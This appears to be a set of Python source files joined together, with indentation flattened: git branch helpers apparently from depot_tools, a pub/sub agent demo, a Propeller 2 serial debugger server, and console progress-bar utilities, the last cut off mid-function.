untracked_bytes += os.stat(f).st_size
if untracked_bytes > limit_mb * MB:
die("""\
You appear to have too much untracked+unignored data in your git
checkout: %.1f / %d MB.
Run `git status` to see what it is.
In addition to making many git commands slower, this will prevent
depot_tools from freezing your in-progress changes.
You should add untracked data that you want to ignore to your repo's
.git/info/excludes
file. See `git help ignore` for the format of this file.
If this data is indended as part of your commit, you may adjust the
freeze limit by running:
git config %s <new_limit>
Where <new_limit> is an integer threshold in megabytes.""",
untracked_bytes / (MB * 1.0), limit_mb, key)
try:
run('commit', '--no-verify', '-m', FREEZE + '.indexed')
took_action = True
except subprocess2.CalledProcessError:
pass
try:
run('add', '-A')
run('commit', '--no-verify', '-m', FREEZE + '.unindexed')
took_action = True
except subprocess2.CalledProcessError:
pass
if not took_action:
return 'Nothing to freeze.'
def get_branch_tree():
"""Get the dictionary of {branch: parent}, compatible with topo_iter.
Returns a tuple of (skipped, <branch_tree dict>) where skipped is a set of
branches without upstream branches defined.
"""
skipped = set()
branch_tree = {}
for branch in branches():
parent = upstream(branch)
if not parent:
skipped.add(branch)
continue
branch_tree[branch] = parent
return skipped, branch_tree
def get_or_create_merge_base(branch, parent=None):
"""Finds the configured merge base for branch.
If parent is supplied, it's used instead of calling upstream(branch).
"""
base = branch_config(branch, 'base')
base_upstream = branch_config(branch, 'base-upstream')
parent = parent or upstream(branch)
if parent is None or branch is None:
return None
actual_merge_base = run('merge-base', parent, branch)
if base_upstream != parent:
base = None
base_upstream = None
def is_ancestor(a, b):
return run_with_retcode('merge-base', '--is-ancestor', a, b) == 0
if base and base != actual_merge_base:
if not is_ancestor(base, branch):
logging.debug('Found WRONG pre-set merge-base for %s: %s', branch, base)
base = None
elif is_ancestor(base, actual_merge_base):
logging.debug('Found OLD pre-set merge-base for %s: %s', branch, base)
base = None
else:
logging.debug('Found pre-set merge-base for %s: %s', branch, base)
if not base:
base = actual_merge_base
manual_merge_base(branch, base, parent)
return base
def hash_multi(*reflike):
return run('rev-parse', *reflike).splitlines()
def hash_one(reflike, short=False):
args = ['rev-parse', reflike]
if short:
args.insert(1, '--short')
return run(*args)
def in_rebase():
git_dir = run('rev-parse', '--git-dir')
return (
os.path.exists(os.path.join(git_dir, 'rebase-merge')) or
os.path.exists(os.path.join(git_dir, 'rebase-apply')))
def intern_f(f, kind='blob'):
"""Interns a file object into the git object store.
Args:
f (file-like object) - The file-like object to intern
kind (git object type) - One of 'blob', 'commit', 'tree', 'tag'.
Returns the git hash of the interned object (hex encoded).
"""
ret = run('hash-object', '-t', kind, '-w', '--stdin', stdin=f)
f.close()
return ret
def is_dormant(branch):
# TODO(iannucci): Do an oldness check?
return branch_config(branch, 'dormant', 'false') != 'false'
def is_unmerged(stat_value):
return (
'U' in (stat_value.lstat, stat_value.rstat) or
((stat_value.lstat == stat_value.rstat) and stat_value.lstat in 'AD')
)
def manual_merge_base(branch, base, parent):
set_branch_config(branch, 'base', base)
set_branch_config(branch, 'base-upstream', parent)
def mktree(treedict):
"""Makes a git tree object and returns its hash.
See |tree()| for the values of mode, type, and ref.
Args:
treedict - { name: (mode, type, ref) }
"""
with tempfile.TemporaryFile() as f:
for name, (mode, typ, ref) in treedict.iteritems():
f.write('%s %s %s\t%s\0' % (mode, typ, ref, name))
f.seek(0)
return run('mktree', '-z', stdin=f)
def parse_commitrefs(*commitrefs):
"""Returns binary encoded commit hashes for one or more commitrefs.
A commitref is anything which can resolve to a commit. Popular examples:
* 'HEAD'
* 'origin/master'
* 'cool_branch~2'
"""
try:
return map(binascii.unhexlify, hash_multi(*commitrefs))
except subprocess2.CalledProcessError:
raise BadCommitRefException(commitrefs)
RebaseRet = collections.namedtuple('RebaseRet', 'success stdout stderr')
def rebase(parent, start, branch, abort=False):
"""Rebases |start|..|branch| onto the branch |parent|.
Args:
parent - The new parent ref for the rebased commits.
start - The commit to start from
branch - The branch to rebase
abort - If True, will call git-rebase --abort in the event that the rebase
doesn't complete successfully.
Returns a namedtuple with fields:
success - a boolean indicating that the rebase command completed
successfully.
message - if the rebase failed, this contains the stdout of the failed
rebase.
"""
try:
args = ['--onto', parent, start, branch]
if TEST_MODE:
args.insert(0, '--committer-date-is-author-date')
run('rebase', *args)
return RebaseRet(True, '', '')
except subprocess2.CalledProcessError as cpe:
if abort:
run_with_retcode('rebase', '--abort') # ignore failure
return RebaseRet(False, cpe.stdout, cpe.stderr)
def remove_merge_base(branch):
del_branch_config(branch, 'base')
del_branch_config(branch, 'base-upstream')
def repo_root():
"""Returns the absolute path to the repository root."""
return run('rev-parse', '--show-toplevel')
def root():
return get_config('depot-tools.upstream', 'origin/master')
@contextlib.contextmanager
def less(): # pragma: no cover
"""Runs 'less' as context manager yielding its stdin as a PIPE.
Automatically checks if sys.stdout is a non-TTY stream. If so, it avoids
running less and just yields sys.stdout.
"""
if not setup_color.IS_TTY:
yield sys.stdout
return
# Run with the same options that git uses (see setup_pager in git repo).
# -F: Automatically quit if the output is less than one screen.
# -R: Don't escape ANSI color codes.
# -X: Don't clear the screen before starting.
cmd = ('less', '-FRX')
try:
proc = subprocess2.Popen(cmd, stdin=subprocess2.PIPE)
yield proc.stdin
finally:
proc.stdin.close()
proc.wait()
def run(*cmd, **kwargs):
"""The same as run_with_stderr, except it only returns stdout."""
return run_with_stderr(*cmd, **kwargs)[0]
def run_with_retcode(*cmd, **kwargs):
"""Run a command but only return the status code."""
try:
run(*cmd, **kwargs)
return 0
except subprocess2.CalledProcessError as cpe:
return cpe.returncode
def run_stream(*cmd, **kwargs):
"""Runs a git command. Returns stdout as a PIPE (file-like object).
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
return proc.stdout
@contextlib.contextmanager
def run_stream_with_retcode(*cmd, **kwargs):
"""Runs a git command as context manager yielding stdout as a PIPE.
stderr is dropped to avoid races if the process outputs to both stdout and
stderr.
Raises subprocess2.CalledProcessError on nonzero return code.
"""
kwargs.setdefault('stderr', subprocess2.VOID)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('shell', False)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
try:
proc = subprocess2.Popen(cmd, **kwargs)
yield proc.stdout
finally:
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(),
None, None)
def run_with_stderr(*cmd, **kwargs):
"""Runs a git command.
Returns (stdout, stderr) as a pair of strings.
kwargs
autostrip (bool) - Strip the output. Defaults to True.
indata (str) - Specifies stdin data for the process.
"""
kwargs.setdefault('stdin', subprocess2.PIPE)
kwargs.setdefault('stdout', subprocess2.PIPE)
kwargs.setdefault('stderr', subprocess2.PIPE)
kwargs.setdefault('shell', False)
autostrip = kwargs.pop('autostrip', True)
indata = kwargs.pop('indata', None)
cmd = (GIT_EXE, '-c', 'color.ui=never') + cmd
proc = subprocess2.Popen(cmd, **kwargs)
ret, err = proc.communicate(indata)
retcode = proc.wait()
if retcode != 0:
raise subprocess2.CalledProcessError(retcode, cmd, os.getcwd(), ret, err)
if autostrip:
ret = (ret or '').strip()
err = (err or '').strip()
return ret, err
def set_branch_config(branch, option, value, scope='local'):
set_config('branch.%s.%s' % (branch, option), value, scope=scope)
def set_config(option, value, scope='local'):
run('config', '--' + scope, option, value)
def get_dirty_files():
# Make sure index is up-to-date before running diff-index.
run_with_retcode('update-index', '--refresh', '-q')
return run('diff-index', '--name-status', 'HEAD')
def is_dirty_git_tree(cmd):
dirty = get_dirty_files()
if dirty:
print 'Cannot %s with a dirty tree. You must commit locally first.' % cmd
print 'Uncommitted files: (git diff-index --name-status HEAD)'
print dirty[:4096]
if len(dirty) > 4096: # pragma: no cover
print '... (run "git diff-index --name-status HEAD" to see full output).'
return True
return False
def status():
"""Returns a parsed version of git-status.
Returns a generator of (current_name, (lstat, rstat, src)) pairs where:
* current_name is the name of the file
* lstat is the left status code letter from git-status
* rstat is the left status code letter from git-status
* src is the current name of the file, or the original name of the file
if lstat == 'R'
"""
stat_entry = collections.namedtuple('stat_entry', 'lstat rstat src')
def tokenizer(stream):
acc = StringIO()
c = None
while c != '':
c = stream.read(1)
if c in (None, '', '\0'):
if acc.len:
yield acc.getvalue()
acc = StringIO()
else:
acc.write(c)
def parser(tokens):
while True:
# Raises StopIteration if it runs out of tokens.
status_dest = next(tokens)
stat, dest = status_dest[:2], status_dest[3:]
lstat, rstat = stat
if lstat == 'R':
src = next(tokens)
else:
src = dest
yield (dest, stat_entry(lstat, rstat, src))
return parser(tokenizer(run_stream('status', '-z', bufsize=-1)))
def squash_current_branch(header=None, merge_base=None):
header = header or 'git squash commit.'
merge_base = merge_base or get_or_create_merge_base(current_branch())
log_msg = header + '\n'
if log_msg:
log_msg += '\n'
log_msg += run('log', '--reverse', '--format=%H%n%B', '%s..HEAD' % merge_base)
run('reset', '--soft', merge_base)
if not get_dirty_files():
# Sometimes the squash can result in the same tree, meaning that there is
# nothing to commit at this point.
print 'Nothing to commit; squashed branch is empty'
return False
run('commit', '--no-verify', '-a', '-F', '-', indata=log_msg)
return True
def tags(*args):
return run('tag', *args).splitlines()
def thaw():
took_action = False
for sha in (s.strip() for s in run_stream('rev-list', 'HEAD').xreadlines()):
msg = run('show', '--format=%f%b', '-s', 'HEAD')
match = FREEZE_MATCHER.match(msg)
if not match:
if not took_action:
return 'Nothing to thaw.'
break
run('reset', '--' + FREEZE_SECTIONS[match.group(1)], sha)
took_action = True
def topo_iter(branch_tree, top_down=True):
"""Generates (branch, parent) in topographical order for a branch tree.
Given a tree:
A1
B1 B2
C1 C2 C3
D1
branch_tree would look like: {
'D1': 'C3',
'C3': 'B2',
'B2': 'A1',
'C1': 'B1',
'C2': 'B1',
'B1': 'A1',
}
It is OK to have multiple 'root' nodes in your graph.
if top_down is True, items are yielded from A->D. Otherwise they're yielded
from D->A. Within a layer the branches will be yielded in sorted order.
"""
branch_tree = branch_tree.copy()
# TODO(iannucci): There is probably a more efficient way to do these.
if top_down:
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if p not in branch_tree]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
del branch_tree[branch]
else:
parent_to_branches = collections.defaultdict(set)
for branch, parent in branch_tree.iteritems():
parent_to_branches[parent].add(branch)
while branch_tree:
this_pass = [(b, p) for b, p in branch_tree.iteritems()
if not parent_to_branches[b]]
assert this_pass, "Branch tree has cycles: %r" % branch_tree
for branch, parent in sorted(this_pass):
yield branch, parent
parent_to_branches[parent].discard(branch)
del branch_tree[branch]
def tree(treeref, recurse=False):
"""Returns a dict representation of a git tree object.
Args:
treeref (str) - a git ref which resolves to a tree (commits count as trees).
recurse (bool) - include all of the tree's decendants too. File names will
take the form of 'some/path/to/file'.
Return format:
{ 'file_name': (mode, type, ref) }
mode is an integer where:
* 0040000 - Directory
* 0100644 - Regular non-executable file
* 0100664 - Regular non-executable group-writeable file
* 0100755 - Regular executable file
* 0120000 - Symbolic link
* 0160000 - Gitlink
type is a string where it's one of 'blob', 'commit', 'tree', 'tag'.
ref is the hex encoded hash of the entry.
"""
ret = {}
opts = ['ls-tree', '--full-tree']
if recurse:
opts.append('-r')
opts.append(treeref)
try:
for line in run(*opts).splitlines():
mode, typ, ref, name = line.split(None, 3)
ret[name] = (mode, typ, ref)
except subprocess2.CalledProcessError:
return None
return ret
def upstream(branch):
try:
return run('rev-parse', '--abbrev-ref', '--symbolic-full-name',
branch+'@{upstream}')
except subprocess2.CalledProcessError:
return None
def get_git_version():
"""Returns a tuple that contains the numeric components of the current git
version."""
version_string = run('--version')
version_match = re.search(r'(\d+.)+(\d+)', version_string)
version = version_match.group() if version_match else ''
return tuple(int(x) for x in version.split('.'))
def get_branches_info(include_tracking_status):
format_string = (
'--format=%(refname:short):%(objectname:short):%(upstream:short):')
# This is not covered by the depot_tools CQ which only has git version 1.8.
if (include_tracking_status and
get_git_version() >= MIN_UPSTREAM_TRACK_GIT_VERSION): # pragma: no cover
format_string += '%(upstream:track)'
info_map = {}
data = run('for-each-ref', format_string, 'refs/heads')
BranchesInfo = collections.namedtuple(
'BranchesInfo', 'hash upstream ahead behind')
for line in data.splitlines():
(branch, branch_hash, upstream_branch, tracking_status) = line.split(':')
ahead_match = re.search(r'ahead (\d+)', tracking_status)
ahead = int(ahead_match.group(1)) if ahead_match else None
behind_match = re.search(r'behind (\d+)', tracking_status)
behind = int(behind_match.group(1)) if behind_match else None
info_map[branch] = BranchesInfo(
hash=branch_hash, upstream=upstream_branch, ahead=ahead, behind=behind)
# Set None for upstreams which are not branches (e.g empty upstream, remotes
# and deleted upstream branches).
missing_upstreams = {}
for info in info_map.values():
if info.upstream not in info_map and info.upstream not in missing_upstreams:
missing_upstreams[info.upstream] = None
return dict(info_map.items() + missing_upstreams.items())
def make_workdir_common(repository, new_workdir, files_to_symlink,
files_to_copy, symlink=None):
if not symlink:
symlink = os.symlink
os.makedirs(new_workdir)
for entry in files_to_symlink:
clone_file(repository, new_workdir, entry, symlink)
for entry in files_to_copy:
clone_file(repository, new_workdir, entry, shutil.copy)
def make_workdir(repository, new_workdir):
GIT_DIRECTORY_WHITELIST = [
'config',
'info',
'hooks',
'logs/refs',
'objects',
'packed-refs',
'refs',
'remotes',
'rr-cache',
'svn'
]
make_workdir_common(repository, new_workdir, GIT_DIRECTORY_WHITELIST,
['HEAD'])
def clone_file(repository, new_workdir, link, operation):
if not os.path.exists(os.path.join(repository, link)):
return
link_dir = os.path.dirname(os.path.join(new_workdir, link))
if not os.path.exists(link_dir):
os.makedirs(link_dir)
operation(os.path.join(repository, link), os.path.join(new_workdir, link))
|
notifications.py
|
import threading
import time
from signal import SIGINT, SIGTERM, signal
from agents import Agent, Message
class NotificationBroker(Agent):
def setup(self, name=None, pub_address=None, sub_address=None):
self.create_notification_broker(pub_address, sub_address)
class Sender(Agent):
def setup(self, name=None, pub_address=None, sub_address=None):
self.counter = 0
self.pub, self.sub = self.create_notification_client(pub_address, sub_address)
# begin sending forever, add to managed threads for graceful cleanup
t = threading.Thread(target=self.send_forever)
self.threads.append(t)
t.start()
def send_forever(self):
# use exit event to gracefully exit loop and graceful cleanup
while not self.exit_event.is_set():
time.sleep(1)
self.counter += 1
msg = Message.Notification(payload=str(self.counter))
self.log.info(f"publishing: {msg}")
self.pub.send(msg.to_multipart())
class Listener(Agent):
def setup(self, name=None, pub_address=None, sub_address=None):
self.pub, self.sub = self.create_notification_client(pub_address, sub_address)
self.disposables.append(
self.sub.observable.subscribe(lambda x: self.log.info(f"received: {x}"))
)
if __name__ == "__main__":
broker = NotificationBroker(
name="broker",
pub_address="tcp://0.0.0.0:5000",
sub_address="tcp://0.0.0.0:5001",
)
sender = Sender(
name="sender",
pub_address="tcp://0.0.0.0:5000",
sub_address="tcp://0.0.0.0:5001",
)
listener = Listener(
name="listener",
pub_address="tcp://0.0.0.0:5000",
sub_address="tcp://0.0.0.0:5001",
)
# override shutdown signals
def shutdown(signum, frame):
sender.shutdown()
listener.shutdown()
broker.shutdown()
signal(SIGTERM, shutdown)
signal(SIGINT, shutdown)
|
p2db_server.py
|
import threading
import time
import io
import serial
import queue
from . import p2info
from . import p2tools
import logging
log = logging.getLogger('main')
class CogState:
DISCONNECTED = 0 # this cog has not been seen and we can't talk to it
IDLE = 1 # this cog is idle and ready to accept data
EXECUTING = 2 # this cog is executing code
def __init__(self, cog_num):
self.status = None
self.cog = cog_num
self.state = CogState.DISCONNECTED
def update_status(self, stat):
self.status = stat
self.state = CogState.IDLE
def get_state(self):
return self.state
class CogPacket():
UNKNOWN = 0
STATUS = 1
HUBBYTE = 2
REG = 3
type_dict = {
UNKNOWN: "unknown",
STATUS: "status",
HUBBYTE: "hub byte",
REG: "register"
}
def get_response_size(c):
if (c == b'g'):
return 20
if (c == b'r'):
return 4
if (c == b'h'):
return 1
return 0
def __init__(self, dat) -> None:
self.bytes = dat
self.cog = int.from_bytes(dat[1:2], 'little')
self.msgid = dat[0:1]
self.raw = dat[2:]
if self.msgid == b'h':
self.value = int.from_bytes(self.raw, 'little')
self.type = CogPacket.HUBBYTE
elif self.msgid == b'r':
self.value = int.from_bytes(self.raw, 'little')
self.type = CogPacket.REG
elif self.msgid == b'g':
self.value = p2info.Status(self.raw, self.cog)
self.type = CogPacket.STATUS
else:
self.type = CogPacket.UNKNOWN
self.value = None
def get_value(self):
return self.value
def get_raw(self):
return self.raw
def get_bytes(self):
return self.bytes
def __str__(self) -> str:
return CogPacket.type_dict[self.type] + ": " + str(self.value) + ", " + str(self.bytes)
class P2DBServer:
'''
Responsible for communicating with a Propeller 2
it should run a separate thread with our serial reading code from before and maintain the state of
the chip
'''
GETBYTE = 1
GETREG = 2
BREAK = 3
STATUS = 4
command_dict = {
GETBYTE: b'h',
GETREG: b'r',
BREAK: b'b',
STATUS: b's'
}
def __init__(self, port):
self.cog_states = [CogState(i) for i in range(8)]
self.stat_dirty = True
self.ser = serial.Serial()
self.ser.baudrate = 2000000
self.ser.timeout = None
self.ser.port = port
self.ser.open()
self.log_queue = queue.Queue()
self.ret_addr = 0 #if we step into a function, store the return address so we can continue until the return
self.current_cog = 0
self.timeout = 2
self.ri = p2info.P2RegInfo()
self.dira = 0
self.dirb = 0
self.outa = 0
self.outb = 0
self.ina = 0
self.inb = 0
self.have_pin_data = False
'''
commands will be a dict:
{
"cmd": cmd
"timeout": if not None, expect a reponse within this many seconds
"value": value associated with comamnd (hub or reg)
"response": response packet. should be None initially and set by the server thread
}
'''
self.cmd = {
"cmd": None,
"timeout": None,
"value": None,
"response": None
}
def _set_cmd(self, cmd, value, timeout=None):
self.cmd = {
"cmd": cmd,
"timeout": timeout,
"value": value,
"response": None
}
def _wait_for_response(self):
self._wait_for_cmd_send()
self.cog_states[self.current_cog].state = CogState.EXECUTING
while(self.cmd["response"] == None):
time.sleep(0.001)
self.cog_states[self.current_cog].state = CogState.IDLE
def _wait_for_cmd_send(self):
while (self.cmd["cmd"] != None):
time.sleep(0.001)
def get_status(self):
return self.cog_states[self.current_cog].status
def load_app(self, port='', app='', verbose=False):
self.port = port
self.app = app
self.verbose = verbose
return p2tools.load(port, app, self.ser.baudrate, verbose)
def start(self):
'''
start the server
'''
log.info("Start P2DB Server...")
t = threading.Thread(target=self.server_main, daemon=True)
t.start()
def set_objdata(self, dat):
self.obj_data = dat
def update_pins(self):
_, self.dira = self.get_reg('dira')
_, self.dirb = self.get_reg('dirb')
_, self.outa = self.get_reg('outa')
_, self.outb = self.get_reg('outb')
_, self.ina = self.get_reg('ina')
_, self.inb = self.get_reg('inb')
self.have_pin_data = True
def get_byte(self, addr, raw=False):
'''
get a byte from the hub.
return a tuple (str, int) with string result and byte. if string is empty, byte is the byte read in, if string is non-empty, there
was an error and byte will be 0
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return ("No connection to cog " + str(self.current_cog), 0)
log.info("get byte @ " + addr)
try:
addr = int(addr, 16)
except ValueError:
return ("Invalid hub address: " + str(addr), 0)
self._set_cmd(self.GETBYTE, addr)
self._wait_for_response()
if raw:
return ("", self.cmd["response"].get_raw())
else:
return ("", self.cmd["response"].get_value())
def get_long(self, addr):
'''
get a long by reading 4 bytes
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return ("No connection to cog " + str(self.current_cog), 0)
log.info("get long @ " + addr)
try:
addr = int(addr, 16)
except ValueError:
return ("Invalid hub address: " + str(addr), 0)
dat = b''
for i in range(4):
dat = dat + self.get_byte(str(addr + i), raw=True)[1]
return ('', int.from_bytes(dat, 'little'))
def get_reg(self, reg):
'''
get a register value. reg should be either a named register or an address
returns tuple: (str, int). The string is empty if the register was read ok, or an error message
to print. if the string is not empty, register value will be 0
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return ("No connection to cog " + str(self.current_cog), 0)
log.debug("get reg " + reg)
try:
addr = int(reg, 16)
except ValueError:
addr = self.ri.getRegAddr(reg)
if addr == None:
return ("Unknown register: " + str(reg) + "\n", 0)
if (addr <= 0xf):
# this range was spilled, read it from teh hub instead
return self.get_long(str(0xfff80 - 0x80*self.current_cog + 4*addr))
elif (addr >= 0xf0 and addr <= 0x1f0):
# this range was spilled, read it from the hub instead
return self.get_long(str(0xfdc00 - 0x400*self.current_cog + 4*(addr - 0xf0)))
elif (addr > 0x1ff):
# not a valid register address
return ("Invalid register address: " + str(addr) + "\nCog RAM registers address must be less than 0x200", 0)
else:
self._set_cmd(self.GETREG, addr)
self._wait_for_response()
return ("", self.cmd["response"].get_value())
def _switch_cog_isr(self, cog):
self._set_cmd(self.STATUS, 0, self.timeout)
self._wait_for_response()
if (isinstance(self.cmd["response"], str) and self.cmd["response"] == "timeout_error"):
self.cog_states[self.current_cog].state = CogState.DISCONNECTED
return "Cog response timeout"
return ""
def continue_exec(self):
'''
Continue execution until the cog interrupts again. Useful if aync interrupts are used
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
self._set_cmd(self.BREAK, 0)
self._wait_for_cmd_send()
self.cog_states[self.current_cog].state = CogState.DISCONNECTED
return ""
def step(self):
'''
step by 1 instruction. will step over function calls
returns a string with error or empty if no error
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
i = p2tools.get_inst(self.obj_data, self.get_status().get_mem_pc())
if i and 'call' in i[1]:
addr = self.get_status().get_mem_pc() + 4
log.info('Stepping over call instruction...')
return self.breakpoint("{:x}".format(addr))
else:
self._set_cmd(self.BREAK, 1)
self._wait_for_cmd_send()
# switch the isr to the current cog
return self._switch_cog_isr(self.current_cog)
def stepin(self):
'''
step into a function call
return a string with error or empty if no error
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
i = p2tools.get_inst(self.obj_data, self.get_status().get_mem_pc())
if 'call' in i[1]:
self.ret_addr = self.get_status().get_mem_pc() + 4
log.info("Stepping into function call, return to " + str(self.ret_addr))
self._set_cmd(self.BREAK, 1)
self._wait_for_cmd_send();
return self._switch_cog_isr(self.current_cog)
else:
return "Can't step in: not a call* instruction"
def stepout(self):
'''
step out of the current function call
'''
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
self.breakpoint("{:x}".format(self.ret_addr))
def breakpoint(self, addr):
if self.cog_states[self.current_cog].get_state() == CogState.DISCONNECTED:
return "No connection to cog " + str(self.current_cog)
addr = int(addr, 16)
i = p2tools.get_inst(self.obj_data, addr)
if 'call' in i[1]:
self.ret_addr = addr + 4
s = self.get_status()
if s.exec_mode == 'cogex': # convert to a cog address
addr -= s.get_cog_addr()
addr /= 4
addr = int(addr)
elif s.exec_mode == 'lutex':
addr -= 0x200
addr /= 4
addr = int(addr) + 0x200
log.info("breakpoint at address " + str(addr))
self._set_cmd(self.BREAK, (addr << 12) + (1 << 10))
self._wait_for_cmd_send()
# switch the isr to the current cog
self._switch_cog_isr(self.current_cog)
return ""
def set_cog(self, cog):
self.current_cog = cog
def process_ser_data(self):
'''
process all current serial data into packets
'''
data = self.ser.read(self.ser.in_waiting)
l = len(data)
packet_buffer = b''
packets = []
if (data):
log.debug("buffer: len = {}, ".format(l) + str(data))
with io.BytesIO(data) as data_stream:
def fill_datastream():
'''
get more data into the datastream due to message fragmentation
returns the number of bytes added
'''
data_frag = self.ser.read(self.ser.in_waiting)
data_frag_l = len(data_frag)
data_stream.write(data_frag)
data_stream.seek(-data_frag_l, 2)
log.debug("added to buffer: {}".format(str(data_frag)))
return data_frag_l
while data_stream.tell() < l:
char = data_stream.read(1)
if char == b'\xdb':
log.debug("have start of message at {}".format(data_stream.tell()-1))
header = data_stream.read(2)
while (len(header) != 2):
# we know more data should come in, so keep trying to read the header
l += fill_datastream()
header += data_stream.read(2-len(header))
log.debug("have header: {}".format(str(header)))
packet_buffer += header
msg_id = header[0:1]
n = CogPacket.get_response_size(msg_id)
if (n != 0):
msg_data = data_stream.read(n)
while len(msg_data) != n:
# we know more data should come in, so keep trying to read until we fill the packet
log.debug("fragmented packet. Expecting {}, have {}".format(n, len(msg_data)))
l += fill_datastream()
msg_data += data_stream.read(n-len(msg_data))
packet_buffer += msg_data
packets.append(CogPacket(packet_buffer))
packet_buffer = b''
else:
log.error("unknown response: {}".format(msg_id))
packet_buffer = b''
else:
log.debug("non-debeug char {} at {}".format(str(char), data_stream.tell()-1))
if (char >= b'\x80'):
self.log_queue.put(str(char))
else:
self.log_queue.put(char.decode('ascii'))
return packets
def send_cmd(self, command, cog, val):
'''
command: bytes object with command byte
cog: int with cog number to send to
val: int with value to send
'''
cmd = b'\xdb' + command + cog.to_bytes(1, 'little') + val.to_bytes(4, 'little')
log.debug("cmd: " + str(cmd))
self.ser.write(cmd)
def pin_updater(self):
while(1):
self.update_pins()
time.sleep(0.5)
def server_main(self):
while(1):
expect_response = None
if (self.cmd["cmd"]):
log.info("Process command: " + str(self.cmd))
if self.cmd["cmd"] == self.GETREG:
expect_response = CogPacket.REG
if self.cmd["cmd"] == self.GETBYTE:
expect_response = CogPacket.HUBBYTE
if self.cmd["cmd"] == self.STATUS:
expect_response = CogPacket.STATUS
# send the command
self.send_cmd(self.command_dict[self.cmd['cmd']], self.current_cog, self.cmd['value'])
self.cmd["cmd"] = None
done = False
timeout = self.cmd["timeout"]
t_start = time.time()
while not done:
packets = self.process_ser_data()
if packets:
self.stat_dirty = True
log.info([str(p) for p in packets])
for p in packets:
if (p.type == CogPacket.STATUS):
# because we construct a new state, we need to copy over the cog_exec address from the existing status
cog_addr_last = self.cog_states[p.cog].status.get_cog_addr() if self.cog_states[p.cog].status else -1
p.get_value().set_cog_addr(cog_addr_last)
self.cog_states[p.cog].update_status(p.get_value())
self.cmd["cmd"] = None
if (p.type == expect_response and p.cog == self.current_cog):
done = True
self.cmd["response"] = p
if timeout and time.time() > t_start + timeout:
log.warning("Cog response timeout")
self.cmd["response"] = "timeout_error"
done = True
if not expect_response:
done = True
time.sleep(0.001)
|
ConsoleUtils.py
|
import io
import logging
import shutil
import sys
import threading
import time
from enum import Enum
from typing import Callable, Iterable, Union, Sized, Optional
from .LoggerUtils import temp_log
__all__ = ['Progress', 'GetInput', 'count_ordinal', 'TerminalStyle']
# noinspection SpellCheckingInspection
class TerminalStyle(Enum):
CEND = '\33[0m'
CBOLD = '\33[1m'
CITALIC = '\33[3m'
CURL = '\33[4m'
CBLINK = '\33[5m'
CBLINK2 = '\33[6m'
CSELECTED = '\33[7m'
CBLACK = '\33[30m'
CRED = '\33[31m'
CGREEN = '\33[32m'
CYELLOW = '\33[33m'
CBLUE = '\33[34m'
CVIOLET = '\33[35m'
CBEIGE = '\33[36m'
CWHITE = '\33[37m'
CBLACKBG = '\33[40m'
CREDBG = '\33[41m'
CGREENBG = '\33[42m'
CYELLOWBG = '\33[43m'
CBLUEBG = '\33[44m'
CVIOLETBG = '\33[45m'
CBEIGEBG = '\33[46m'
CWHITEBG = '\33[47m'
CGREY = '\33[90m'
CRED2 = '\33[91m'
CGREEN2 = '\33[92m'
CYELLOW2 = '\33[93m'
CBLUE2 = '\33[94m'
CVIOLET2 = '\33[95m'
CBEIGE2 = '\33[96m'
CWHITE2 = '\33[97m'
CGREYBG = '\33[100m'
CREDBG2 = '\33[101m'
CGREENBG2 = '\33[102m'
CYELLOWBG2 = '\33[103m'
CBLUEBG2 = '\33[104m'
CVIOLETBG2 = '\33[105m'
CBEIGEBG2 = '\33[106m'
CWHITEBG2 = '\33[107m'
@staticmethod
def color_table():
"""
prints table of formatted text format options
"""
for style in range(8):
for fg in range(30, 38):
s1 = ''
for bg in range(40, 48):
_format = ';'.join([str(style), str(fg), str(bg)])
s1 += '\x1b[%sm %s \x1b[0m' % (_format, _format)
print(s1)
print('\n')
class Progress(object):
DEFAULT = '{prompt} [{bar}] {progress:>7.2%} {eta}{done}'
MINI = '{prompt} {progress:.2%}'
FULL = '{prompt} [{bar}] {done_tasks}/{total_tasks} {progress:>7.2%}, {remaining} to go {eta}{done}'
def __init__(self, tasks: Union[int, Iterable], prompt: str = 'Progress:', format_spec: str = DEFAULT, **kwargs):
self.prompt = prompt
self.format_spec = format_spec
self._width = kwargs.pop('width', None)
self.tick_size = kwargs.pop('tick_size', 0.0001)
self.progress_symbol = kwargs.pop('progress_symbol', '=')
self.blank_symbol = kwargs.pop('blank_symbol', ' ')
if isinstance(tasks, int):
self.total_tasks = tasks
self.tasks = range(self.total_tasks)
elif isinstance(tasks, (Sized, Iterable)):
self.total_tasks = len(tasks)
self.tasks = tasks
if 'outputs' not in kwargs:
self.outputs = [sys.stdout]
else:
outputs = kwargs.pop('outputs')
if outputs is None:
self.outputs = []
elif isinstance(outputs, Iterable):
self.outputs = outputs
else:
self.outputs = [outputs]
self.start_time = time.time()
self.done_tasks = 0
self.done_time = None
self.iter_task = None
self.last_output = -1
@property
def eta(self):
remaining = self.total_tasks - self.done_tasks
time_cost = time.time() - self.start_time
if self.done_tasks == 0:
eta = float('inf')
else:
eta = time_cost / self.done_tasks * remaining
return eta
@property
def work_time(self):
if self.done_time:
work_time = self.done_time - self.start_time
else:
work_time = time.time() - self.start_time
return work_time
@property
def is_done(self):
return self.done_tasks == self.total_tasks
@property
def progress(self):
return self.done_tasks / self.total_tasks
@property
def remaining(self):
return self.total_tasks - self.done_tasks
@property
def width(self):
if self._width:
width = self._width
else:
width = shutil.get_terminal_size().columns
return width
def format_progress(self):
if self.is_done:
